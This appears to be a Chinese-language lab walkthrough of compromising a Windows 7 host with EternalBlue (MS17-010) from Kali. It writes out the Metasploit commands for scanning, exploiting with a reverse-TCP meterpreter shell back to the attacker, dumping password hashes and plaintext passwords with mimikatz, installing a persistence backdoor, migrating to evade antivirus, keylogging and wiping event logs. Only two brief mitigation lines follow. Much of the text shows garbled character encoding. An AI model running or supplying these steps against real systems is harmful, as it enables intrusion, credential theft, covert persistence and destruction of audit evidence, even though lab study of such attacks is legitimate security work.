實驗環(huán)境
客戶機(win7 ip:192.168.0.105)
攻擊機(kali ip:192.168.0.101)
具體步驟
查看局域網(wǎng)設(shè)備
使用netdiscover 查看局域網(wǎng)的設(shè)備
如上圖所示,搜索到了一臺IP為192.168.0.103的設(shè)備
使用 nmap 掃描
root@WHOAMI:~# nmap -sS -A -p- -v -O 192.168.0.103
-sS 半開掃描
-A 全面系統(tǒng)檢測、啟用腳本檢測、掃描等
-p- 掃描全部開放的端口
-v 顯示掃描過程,
-O 啟用遠程操作系統(tǒng)檢測,存在誤報
掃描結(jié)果如下圖
發(fā)現(xiàn)目標(biāo)機器開放的端口還有windows 7操作系統(tǒng)
對主機進行掃描確認(rèn)是否存在漏洞
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.0.103
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
上圖中出現(xiàn)- Host is likely VULNERABLE to MS17-010!說明客戶機存在MS17-010漏洞下面開始漏洞利用
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.103
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.101
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
連接成功
查看權(quán)限
meterpreter > getuid
查看登錄的用戶的明文密碼
使用命令 run hashdump 加載 hashdump 模塊
使用命令 load mimikatz 加載 mimikatz 模塊,再使用 help mimikatz
使用 wdigest 命令獲取登錄過的用戶儲存在內(nèi)存里的明文密碼
查看分區(qū)
run post/windows/gather/forensics/enum_drives
查看補丁信息
給 win7 留后門
使用命令 run persistence -X -i 10 -r 192.168.0.101 -p 444
再開啟一個 msf
加載 handler 模塊
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.101
msf5 exploit(multi/handler) > set LPORT 444
msf5 exploit(multi/handler) > run
如下圖成功在444端口監(jiān)聽到一個會話
Metasploit 鍵盤記錄
ps查看進程
將meterpreter當(dāng)前的進程移動到其他指定的進程中,這樣做的好處是可以給meterpreter一個相對穩(wěn)定的運行環(huán)境,同時可以很好的躲避殺毒軟件
最后,我們啟動鍵盤記錄器,等待一段時間并轉(zhuǎn)儲輸出。
清除痕跡
在滲透入侵的過程中難免會留下一下日志信息痕跡,我們可以使用此命令來擦除留下的痕跡
使用clearev
解決措施
·及時打補丁
·安裝殺毒軟件自動更新補丁